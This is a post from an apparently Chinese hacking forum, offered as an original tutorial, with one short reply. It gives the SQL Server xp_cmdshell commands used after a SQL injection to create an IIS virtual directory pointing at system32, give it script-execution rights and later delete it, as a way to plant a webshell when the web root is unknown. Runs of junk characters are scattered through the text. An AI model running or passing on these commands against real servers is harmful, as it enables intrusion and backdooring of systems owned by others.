返回列表 发帖

[原创教程] 如何SQL注入建立虚拟目录

很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:
8 m$ ^. ]/ \, r- d1 W6 ~
0 F# R* h9 X) Y- ]! n4 @exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'
8 l) Z; o+ p, {- A" t+ R建立虚拟目录win,指向c:\windows\system32
- s3 Z) m( Q9 f: f8 r% k5 |exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'5 g$ l7 A+ C% Z$ Z3 K$ X
让win句有解析asp脚本权限
1 j$ M3 c; V/ \9 l: M+ S0 ^% \0 G
9 J0 H# Y/ a+ Y3 z4 L1 I' qexec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
7 l4 u, T/ o7 d8 w3 P/ Y% k删除虚拟目录。
5 M  F$ J, m1 W( ~5 V! D7 Y& m找不到web绝对路径的一种解决办法,* M4 h' ^; [; h) f
/ u6 w5 ~) z5 _4 Z2 z
403错误,表示虚拟目录建好了。。
1

评分人数

呀  LZ好久不见你上了啊

TOP

返回列表